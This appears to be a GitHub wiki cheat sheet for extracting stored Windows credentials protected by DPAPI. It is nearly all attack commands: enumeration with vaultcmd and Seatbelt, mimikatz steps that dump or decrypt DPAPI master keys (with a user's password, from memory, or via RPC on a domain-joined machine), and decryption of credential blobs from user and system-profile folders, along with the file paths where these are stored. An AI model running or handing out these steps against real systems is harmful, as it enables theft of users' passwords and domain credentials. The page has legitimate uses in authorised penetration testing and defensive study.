Extracting credentials from DPAPI - CraigDonkin/Infrastructure GitHub Wiki
vaultcmd /list
vaultcmd /listcreds:"<vault name>" /all
Seatbelt.exe WindowsVault
Seatbelt.exe WindowsCredentialFiles
mimikatz vault::list
Encrypted credentials are stored in:
C:\Users\<username>\AppData\Local\Microsoft\Credentials
Credentials stored by scheduled tasks are stored in (requires admin to access):
C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Credentials\
The master key is represented by a GUID stored in:
C:\Users\<username>\AppData\Roaming\Microsoft\Protect\<SID>
- Needs local admin access, look out for the GUID representing the key.
mimikatz !sekurlsa::dpapi
- Doesn't need local admin but needs the user's credential
mimikatz dpapi::masterkey /in:"C:\Users\<username>\AppData\Roaming\Microsoft\Protect\<SID>\<GUID>" /sid:<SID> /password:<password> /protected
- Doesn't need local admin, and doesn't need the password but you need to be on an AD joined machine and the command is executed in the context of the key owner.
mimikatz dpapi::masterkey /in:"C:\Users\<username>\AppData\Roaming\Microsoft\Protect\<SID>\<GUID>" /rpc
mimikatz dpapi::cred /in:"C:\Users\<username>\AppData\Local\Microsoft\Credentials\<GUID> /masterkey:<masterkey>
mimikatz dpapi::cred /in:"C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Credentials\<GUID>" /masterkey:<masterkey>